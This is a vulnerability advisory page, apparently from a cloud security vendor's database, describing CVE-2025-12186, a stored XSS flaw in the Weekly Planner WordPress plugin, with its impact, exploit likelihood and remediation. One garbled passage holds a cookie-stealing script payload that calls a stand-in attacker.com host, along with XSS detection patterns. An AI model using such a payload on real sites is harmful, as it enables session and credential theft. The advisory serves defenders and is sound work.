
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-12186 is a Stored Cross-Site Scripting (XSS) vulnerability in the Weekly Planner plugin for WordPress, affecting all versions up to and including 1.0. The flaw stems from insufficient input sanitization and output escaping in the plugin's admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts into pages. The vulnerability was published on December 5, 2025, and was assigned by Wordfence. It carries a CVSS v3.1 base score of 4.4 (Medium) and is limited in scope to multi-site WordPress installations or those where unfiltered_html has been disabled (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), arising from the plugin's failure to properly sanitize administrator-supplied input in settings fields and to escape output when rendering those values on pages. An authenticated attacker with administrator privileges can submit malicious JavaScript payloads through the plugin's admin settings interface; these payloads are then stored in the database and executed in the browser of any user who visits an affected page. Exploitation requires high privileges (administrator-level) and is constrained to multi-site WordPress environments or single-site installations where unfiltered_html capability has been explicitly disabled (Wordfence, Red Hat CVE).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers when they visit pages rendered with the injected content, potentially leading to session hijacking, credential theft, phishing, or unauthorized actions performed on behalf of victims. The CVSS scope is rated as "Changed," meaning the impact can extend beyond the vulnerable component to affect other users or systems. Confidentiality and integrity impacts are rated Low, and there is no direct availability impact; however, in a multi-site environment, the blast radius could extend across multiple sites sharing the same WordPress installation (Wordfence, Red Hat CVE).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-12186. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is further constrained by the requirement for administrator-level authentication and specific WordPress configuration conditions (multi-site or disabled unfiltered_html) (Wordfence).
unfiltered_html is disabled, running Weekly Planner plugin version ≤ 1.0.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.<script>, javascript:, or encoded XSS payloads (e.g., %3Cscript%3E) in WordPress database entries associated with the Weekly Planner plugin options table (wp_options).The primary remediation is to update the Weekly Planner plugin to a version beyond 1.0 if a patched release becomes available; administrators should monitor the WordPress plugin repository for updates. As an interim workaround, restrict administrator access to trusted users only and audit existing plugin settings for injected content. Site operators should also consider enabling unfiltered_html restrictions only where necessary, as this vulnerability is limited to environments where it is disabled or multi-site setups. If the plugin is not actively needed, deactivating and removing it eliminates the attack surface entirely (Wordfence, WordPress Plugin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."